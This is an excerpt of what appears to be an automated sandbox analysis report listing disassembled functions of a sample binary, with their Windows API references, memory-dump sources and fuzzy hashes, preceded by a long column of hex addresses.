                                                                                                    0x003f7433
                                                                                                    0x003f7435
                                                                                                    0x003f743a
                                                                                                    0x003f743a
                                                                                                    0x003f743d
                                                                                                    0x003f7440
                                                                                                    0x003f7444
                                                                                                    0x003f7446
                                                                                                    0x003f744b
                                                                                                    0x003f744b
                                                                                                    0x003f744e
                                                                                                    0x00000000
                                                                                                    0x003f744e
                                                                                                    0x003f73b2
                                                                                                    0x003f72c5
                                                                                                    0x003f72c8
                                                                                                    0x003f72cc
                                                                                                    0x003f72ce
                                                                                                    0x003f72d3
                                                                                                    0x003f72d3
                                                                                                    0x003f72d6
                                                                                                    0x003f72d9
                                                                                                    0x003f72dd
                                                                                                    0x003f72df
                                                                                                    0x003f72e4
                                                                                                    0x003f72e4
                                                                                                    0x003f72ed
                                                                                                    0x003f72f1
                                                                                                    0x003f72f6
                                                                                                    0x003f72f9
                                                                                                    0x003f72fd
                                                                                                    0x003f72ff
                                                                                                    0x003f7304
                                                                                                    0x003f7304
                                                                                                    0x003f7307
                                                                                                    0x003f730a
                                                                                                    0x003f730e
                                                                                                    0x003f7310
                                                                                                    0x003f7315
                                                                                                    0x003f7315
                                                                                                    0x003f7318
                                                                                                    0x00000000
                                                                                                    0x003f7318
                                                                                                    0x003f7258
                                                                                                    0x003f725b
                                                                                                    0x003f725f
                                                                                                    0x003f7261
                                                                                                    0x003f7266
                                                                                                    0x003f7266
                                                                                                    0x003f7269
                                                                                                    0x003f726c
                                                                                                    0x003f7270
                                                                                                    0x003f7272
                                                                                                    0x003f7277
                                                                                                    0x003f7277
                                                                                                    0x003f7280
                                                                                                    0x003f7284
                                                                                                    0x003f7289
                                                                                                    0x003f728c
                                                                                                    0x003f7290
                                                                                                    0x003f7292
                                                                                                    0x003f7297
                                                                                                    0x003f7297
                                                                                                    0x003f729a
                                                                                                    0x003f729d
                                                                                                    0x003f72a1
                                                                                                    0x003f72a3
                                                                                                    0x003f72a8
                                                                                                    0x003f72a8
                                                                                                    0x003f72ab
                                                                                                    0x00000000
                                                                                                    0x003f7197
                                                                                                    0x003f7197
                                                                                                    0x003f719d
                                                                                                    0x003f71a3
                                                                                                    0x003f71b0
                                                                                                    0x003f71b7
                                                                                                    0x003f71c1
                                                                                                    0x003f71c4
                                                                                                    0x003f71c4
                                                                                                    0x003f71c5
                                                                                                    0x003f71c8
                                                                                                    0x003f71cb
                                                                                                    0x003f71ce
                                                                                                    0x003f71d1
                                                                                                    0x003f71d1
                                                                                                    0x003f71d2
                                                                                                    0x003f71d5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f71d7
                                                                                                    0x003f71db
                                                                                                    0x003f71e4
                                                                                                    0x003f71dd
                                                                                                    0x003f71dd
                                                                                                    0x003f71dd
                                                                                                    0x003f71e7
                                                                                                    0x003f71ed
                                                                                                    0x003f71f0
                                                                                                    0x00000000
                                                                                                    0x003f71f2
                                                                                                    0x003f71f2
                                                                                                    0x003f71f5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f71f8
                                                                                                    0x00000000
                                                                                                    0x003f71f8
                                                                                                    0x003f71f0
                                                                                                    0x003f71fd
                                                                                                    0x003f71fd
                                                                                                    0x003f7200
                                                                                                    0x003f7203
                                                                                                    0x003f7206
                                                                                                    0x003f7209
                                                                                                    0x003f720c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f721f
                                                                                                    0x003f7222
                                                                                                    0x003f7225
                                                                                                    0x003f7225
                                                                                                    0x00000000
                                                                                                    0x003f7206
                                                                                                    0x003f7191
                                                                                                    0x003f7109
                                                                                                    0x003f710c
                                                                                                    0x003f7110
                                                                                                    0x003f7112
                                                                                                    0x003f7117
                                                                                                    0x003f7117
                                                                                                    0x003f711a
                                                                                                    0x003f711d
                                                                                                    0x003f7121
                                                                                                    0x003f7123
                                                                                                    0x003f7128
                                                                                                    0x003f7128
                                                                                                    0x003f7131
                                                                                                    0x003f7135
                                                                                                    0x003f713a
                                                                                                    0x003f713d
                                                                                                    0x003f7141
                                                                                                    0x003f7143
                                                                                                    0x003f7148
                                                                                                    0x003f7148
                                                                                                    0x003f714b
                                                                                                    0x003f714e
                                                                                                    0x003f7152
                                                                                                    0x003f7154
                                                                                                    0x003f7159
                                                                                                    0x003f7159
                                                                                                    0x00000000
                                                                                                    0x003f7154
                                                                                                    0x003f70b1
                                                                                                    0x003f70b4
                                                                                                    0x003f70b8
                                                                                                    0x003f70ba
                                                                                                    0x003f70bf
                                                                                                    0x003f70bf
                                                                                                    0x003f70c2
                                                                                                    0x003f70c5
                                                                                                    0x003f70c9
                                                                                                    0x003f70cb
                                                                                                    0x003f70d0
                                                                                                    0x003f70d0
                                                                                                    0x003f70d9
                                                                                                    0x003f70dd
                                                                                                    0x003f70e2
                                                                                                    0x003f70e5
                                                                                                    0x003f70e9
                                                                                                    0x003f70eb
                                                                                                    0x003f70f0
                                                                                                    0x003f70f0
                                                                                                    0x003f70f3
                                                                                                    0x003f70f6
                                                                                                    0x003f70fa
                                                                                                    0x00000000
                                                                                                    0x003f70fa
                                                                                                    0x003f6fb8
                                                                                                    0x003f6fbc
                                                                                                    0x003f6fbe
                                                                                                    0x003f6fc7
                                                                                                    0x003f6fc7
                                                                                                    0x00000000
                                                                                                    0x003f6f24
                                                                                                    0x003f6f24
                                                                                                    0x003f6f29
                                                                                                    0x003f6f32
                                                                                                    0x003f6f32
                                                                                                    0x003f715c
                                                                                                    0x003f715c
                                                                                                    0x003f76c3
                                                                                                    0x003f76c8
                                                                                                    0x003f76d1
                                                                                                    0x003f76d1

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 1f2ecfe2233d5637c06c11562ca2c6155fd7b62cd533acec81ebb6357f41301a
                                                                                                    • Instruction ID: ad57c578b758d18b234ce40dc6a7458562ebee29f68412bb1a49b4de3ef74020
                                                                                                    • Opcode Fuzzy Hash: 1f2ecfe2233d5637c06c11562ca2c6155fd7b62cd533acec81ebb6357f41301a
                                                                                                    • Instruction Fuzzy Hash: 8752903090424DDFDF12CFA8C984BADBBB5AF49304F28409DE945AB291DB75EE45CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C4F01 Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 8c6f80bbaed93c13f4638cc0b4598c74c5dd9da320a8c9cd690c9498b7af5e64
                                                                                                    • Instruction ID: bc4be09c95012815bb01d74c5f307cdfb469b677cd7a6fcd40fadbe38b76be5f
                                                                                                    • Opcode Fuzzy Hash: 8c6f80bbaed93c13f4638cc0b4598c74c5dd9da320a8c9cd690c9498b7af5e64
                                                                                                    • Instruction Fuzzy Hash: A1F19731904B85DFCB22CF64C494BAABBE1BF19300F59886EE49ADB611D771BD84CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FCF5C Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: dbf15bf872be108bbbbfea3d5fca7e078332e95fc142ed74c306cc415857d05e
                                                                                                    • Instruction ID: 7358cb72614e7ae9402e9e961ef85a93350b40e920e83ef9c0e67ac8daf41386
                                                                                                    • Opcode Fuzzy Hash: dbf15bf872be108bbbbfea3d5fca7e078332e95fc142ed74c306cc415857d05e
                                                                                                    • Instruction Fuzzy Hash: 92D1C170A0064AAFDF26CFA4C888BFEBBF2BF44304F10892DE65597251D775A844CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F8E31 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F8E36
                                                                                                      • Part of subcall function 003FD39A: __EH_prolog.LIBCMT ref: 003FD39F
                                                                                                      • Part of subcall function 003FD39A: _CxxThrowException.MSVCRT(?,00438128), ref: 003FD3EA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2366012087-0
                                                                                                    • Opcode ID: 9eca3764224e59f7ba84d7b0cb66c2005226508acdd89dbc7faa6bb3bdd08a13
                                                                                                    • Instruction ID: cdec408c598ba07e630c8575dffaeb63ad7458b6458f806105b285da793a630c
                                                                                                    • Opcode Fuzzy Hash: 9eca3764224e59f7ba84d7b0cb66c2005226508acdd89dbc7faa6bb3bdd08a13
                                                                                                    • Instruction Fuzzy Hash: 08517171900249DFCB16CF68C888BAEBBB5AF49304F14449EF55AD7242CB759E45CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EE590 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: e28844f528f428705b500ac9062b053faf72b1822466e098e692d104802c87e1
                                                                                                    • Instruction ID: 46039a7482503256c1fe7e8431d3c0b0160fe5e3d35ba59b65005bc5a27a6712
                                                                                                    • Opcode Fuzzy Hash: e28844f528f428705b500ac9062b053faf72b1822466e098e692d104802c87e1
                                                                                                    • Instruction Fuzzy Hash: E6516A74A00666DFCB25CF65C4809AEFBB2FF89304B104A5DE592AB790D732E905CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F6BA9 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 19b2105b70a8afa3013c2b134daf1faaebb8fe114e27f0fae59e6de578157069
                                                                                                    • Instruction ID: dbee20b1c3de42df659530c760e6388f3d57341eba1e6dc16a4884cccfbc8c11
                                                                                                    • Opcode Fuzzy Hash: 19b2105b70a8afa3013c2b134daf1faaebb8fe114e27f0fae59e6de578157069
                                                                                                    • Instruction Fuzzy Hash: F6418BB0A00649AFDB26CF64C485B7ABBB0FF15310F15866DE5D69B692C370ED80CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C2E4C Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C2E51
                                                                                                      • Part of subcall function 003C3007: __EH_prolog.LIBCMT ref: 003C300C
                                                                                                      • Part of subcall function 003B1E0C: malloc.MSVCRT ref: 003B1E1F
                                                                                                      • Part of subcall function 003B1E0C: _CxxThrowException.MSVCRT(?,00430098), ref: 003B1E39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrowmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3744649731-0
                                                                                                    • Opcode ID: 23f60d1e09d87dfdfd5326be1ea22c7a4d2d667b680125c310ab598a4ebc048d
                                                                                                    • Instruction ID: 39172ce5a0997c58cb37211777b03a60ac29713c4b88697d2ae45565cd0590df
                                                                                                    • Opcode Fuzzy Hash: 23f60d1e09d87dfdfd5326be1ea22c7a4d2d667b680125c310ab598a4ebc048d
                                                                                                    • Instruction Fuzzy Hash: 4F51E5B0501784CFD722DF69C1846CAFFF0BF19304F4489AEC49A9B652D7B8AA48CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003DBEB6 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003DBEBB
                                                                                                      • Part of subcall function 003B1E0C: malloc.MSVCRT ref: 003B1E1F
                                                                                                      • Part of subcall function 003B1E0C: _CxxThrowException.MSVCRT(?,00430098), ref: 003B1E39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionH_prologThrowmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3978722251-0
                                                                                                    • Opcode ID: 5f19aae8bc96382cb3bfafc3fca0341eeaa7b0a2e4ee696437a9c4a854825d10
                                                                                                    • Instruction ID: 1efb3fdd472446800e997e6ec986eb46462f15c52ccc6d55c048b21fdde2c8bf
                                                                                                    • Opcode Fuzzy Hash: 5f19aae8bc96382cb3bfafc3fca0341eeaa7b0a2e4ee696437a9c4a854825d10
                                                                                                    • Instruction Fuzzy Hash: 1141B172A04214DFCB12DFA8D8947AEFBB8AF44314F25445AE445EB682CB74DD01CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E9BCE Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E9BD3
                                                                                                      • Part of subcall function 003E9B40: __EH_prolog.LIBCMT ref: 003E9B45
                                                                                                      • Part of subcall function 003E9D44: __EH_prolog.LIBCMT ref: 003E9D49
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 0f63fb9107413905005520cb3b9dddad14c528ae8749b023e9fdfe57e59f8757
                                                                                                    • Instruction ID: ec84873f2a51429ecdbdb35b6ee848a42d20e42df97af76fec9d637e0e669e7f
                                                                                                    • Opcode Fuzzy Hash: 0f63fb9107413905005520cb3b9dddad14c528ae8749b023e9fdfe57e59f8757
                                                                                                    • Instruction Fuzzy Hash: 1541EC7144ABC0DEC322DF7980546C6FFE06F25204F94CA9EC4EA47B52D674A60CC726
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003CF237 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: a4619a0d698b2983bf2b1e609e45c227a2dd4952ea92b747f68ac66585b64b67
                                                                                                    • Instruction ID: d7c1a346704c4403d74a98a02db14194747fecd9cc0a7ef42917dea246c67d25
                                                                                                    • Opcode Fuzzy Hash: a4619a0d698b2983bf2b1e609e45c227a2dd4952ea92b747f68ac66585b64b67
                                                                                                    • Instruction Fuzzy Hash: 1B3110B9D00219EFCB15DF95C891DAEFBB5FF84354B20852EE416A7241C7305E00CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D85BA Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D85BF
                                                                                                      • Part of subcall function 003D864F: __EH_prolog.LIBCMT ref: 003D8654
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 7ec16055c5c5857e8501511f00ff77824845db1f2c589fd547935e9053f9eecd
                                                                                                    • Instruction ID: 795f44c54bcea84f22d79dce5f54a1a1005e80d486f686bf6a26c5a9f6eb362f
                                                                                                    • Opcode Fuzzy Hash: 7ec16055c5c5857e8501511f00ff77824845db1f2c589fd547935e9053f9eecd
                                                                                                    • Instruction Fuzzy Hash: 80116A36A00201EFCB14CF68D884BAA73B8FF89320F14845AF915CB390DB75E801CB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B355E Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B3563
                                                                                                      • Part of subcall function 003EF23F: _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003EF265
                                                                                                      • Part of subcall function 003B1524: __EH_prolog.LIBCMT ref: 003B1529
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2366012087-0
                                                                                                    • Opcode ID: 72960931d645af82f2c692029ab39850a238ae4aaae35c84c179b84962a2bca4
                                                                                                    • Instruction ID: 3ac6580897862ca9967af2a69fa8f83cf18f0d37e16b69bc25e3a77e9d2ec6a4
                                                                                                    • Opcode Fuzzy Hash: 72960931d645af82f2c692029ab39850a238ae4aaae35c84c179b84962a2bca4
                                                                                                    • Instruction Fuzzy Hash: E211B276D0012A8FCF26FB99D4916FEF3B5FF85308F50442BA2226B591CB746A45CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003CEE23 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003CEE28
                                                                                                      • Part of subcall function 003C2962: __EH_prolog.LIBCMT ref: 003C2967
                                                                                                      • Part of subcall function 003C2962: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,777989A0), ref: 003C2979
                                                                                                      • Part of subcall function 003C2962: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,777989A0), ref: 003C2990
                                                                                                      • Part of subcall function 003C2962: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 003C29B2
                                                                                                      • Part of subcall function 003C2962: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,777989A0), ref: 003C29C7
                                                                                                      • Part of subcall function 003C2962: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,777989A0), ref: 003C29D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1532160333-0
                                                                                                    • Opcode ID: 579ebc4728ddf72aea3d48cb266b20ddcc52174693ebc3f39286f2fc709adf9b
                                                                                                    • Instruction ID: 5c658ec6e863db6ed43e97dc983abb81feb3f6439e0ba966bb9c8e75c8151d03
                                                                                                    • Opcode Fuzzy Hash: 579ebc4728ddf72aea3d48cb266b20ddcc52174693ebc3f39286f2fc709adf9b
                                                                                                    • Instruction Fuzzy Hash: 152137B1946B90DFC321CF6B82C0686FFF0BB29604B94996ED0DA83B12C374A548CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D0878 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D087D
                                                                                                      • Part of subcall function 003B695D: __EH_prolog.LIBCMT ref: 003B6962
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
